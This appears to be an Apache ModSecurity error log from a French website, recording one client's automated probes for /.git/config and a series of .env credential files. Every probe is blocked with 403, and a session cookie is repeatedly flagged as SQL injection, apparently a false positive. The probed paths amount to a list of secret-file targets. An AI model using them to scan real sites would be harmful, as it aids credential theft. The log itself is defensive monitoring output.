[Mon May 11 14:09:47.406678 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHHC1chVQ3tCn0m9OpAawAAAQ4"]
[Mon May 11 14:09:47.569938 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.git/config"] [unique_id "agHHC1chVQ3tCn0m9OpAbgAAAQ4"]
[Mon May 11 14:09:47.570478 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.git/config"] [unique_id "agHHC1chVQ3tCn0m9OpAbgAAAQ4"]
[Mon May 11 14:09:47.570784 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.git/config"] [unique_id "agHHC1chVQ3tCn0m9OpAbgAAAQ4"]
[Mon May 11 14:09:47.571056 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.git/config"] [unique_id "agHHC1chVQ3tCn0m9OpAbgAAAQ4"]
[Mon May 11 14:09:47.769987 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHHC1chVQ3tCn0m9OpAcAAAAQ4"]
[Mon May 11 14:09:47.770218 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHHC1chVQ3tCn0m9OpAcAAAAQ4"]
[Mon May 11 14:09:47.783857 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHHC1chVQ3tCn0m9OpAcAAAAQ4"]
[Mon May 11 14:09:47.997498 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env"] [unique_id "agHHC1chVQ3tCn0m9OpAcQAAAQ4"]
[Mon May 11 14:09:47.997923 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env"] [unique_id "agHHC1chVQ3tCn0m9OpAcQAAAQ4"]
[Mon May 11 14:09:47.998123 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env"] [unique_id "agHHC1chVQ3tCn0m9OpAcQAAAQ4"]
[Mon May 11 14:09:47.998427 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env"] [unique_id "agHHC1chVQ3tCn0m9OpAcQAAAQ4"]
[Mon May 11 14:09:48.181555 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.local"] [unique_id "agHHDFchVQ3tCn0m9OpAcwAAAQ4"]
[Mon May 11 14:09:48.181992 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.local"] [unique_id "agHHDFchVQ3tCn0m9OpAcwAAAQ4"]
[Mon May 11 14:09:48.182242 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.local"] [unique_id "agHHDFchVQ3tCn0m9OpAcwAAAQ4"]
[Mon May 11 14:09:48.182814 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.local"] [unique_id "agHHDFchVQ3tCn0m9OpAcwAAAQ4"]
[Mon May 11 14:09:48.310828 2026] [core:error] [pid 1319885:tid 1319930] [client 52.242.216.199:21744] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:48.310935 2026] [core:error] [pid 1319885:tid 1319930] [client 52.242.216.199:21744] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:48.366187 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.production"] [unique_id "agHHDFchVQ3tCn0m9OpAdQAAAQ4"]
[Mon May 11 14:09:48.366573 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.production"] [unique_id "agHHDFchVQ3tCn0m9OpAdQAAAQ4"]
[Mon May 11 14:09:48.366762 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.production"] [unique_id "agHHDFchVQ3tCn0m9OpAdQAAAQ4"]
[Mon May 11 14:09:48.367014 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.production"] [unique_id "agHHDFchVQ3tCn0m9OpAdQAAAQ4"]
[Mon May 11 14:09:48.583613 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.staging"] [unique_id "agHHDFchVQ3tCn0m9OpAegAAAQ4"]
[Mon May 11 14:09:48.584047 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.staging"] [unique_id "agHHDFchVQ3tCn0m9OpAegAAAQ4"]
[Mon May 11 14:09:48.584252 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.staging"] [unique_id "agHHDFchVQ3tCn0m9OpAegAAAQ4"]
[Mon May 11 14:09:48.584533 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.staging"] [unique_id "agHHDFchVQ3tCn0m9OpAegAAAQ4"]
[Mon May 11 14:09:48.817091 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.development"] [unique_id "agHHDFchVQ3tCn0m9OpAfgAAAQ4"]
[Mon May 11 14:09:48.817576 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.development"] [unique_id "agHHDFchVQ3tCn0m9OpAfgAAAQ4"]
[Mon May 11 14:09:48.817775 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.development"] [unique_id "agHHDFchVQ3tCn0m9OpAfgAAAQ4"]
[Mon May 11 14:09:48.818085 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.development"] [unique_id "agHHDFchVQ3tCn0m9OpAfgAAAQ4"]
[Mon May 11 14:09:49.068618 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.test"] [unique_id "agHHDVchVQ3tCn0m9OpAgQAAAQ4"]
[Mon May 11 14:09:49.069072 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.test"] [unique_id "agHHDVchVQ3tCn0m9OpAgQAAAQ4"]
[Mon May 11 14:09:49.069276 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.test"] [unique_id "agHHDVchVQ3tCn0m9OpAgQAAAQ4"]
[Mon May 11 14:09:49.069572 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.test"] [unique_id "agHHDVchVQ3tCn0m9OpAgQAAAQ4"]
[Mon May 11 14:09:49.287995 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.remote"] [unique_id "agHHDVchVQ3tCn0m9OpAgwAAAQ4"]
[Mon May 11 14:09:49.288369 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.remote"] [unique_id "agHHDVchVQ3tCn0m9OpAgwAAAQ4"]
[Mon May 11 14:09:49.288552 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.remote"] [unique_id "agHHDVchVQ3tCn0m9OpAgwAAAQ4"]
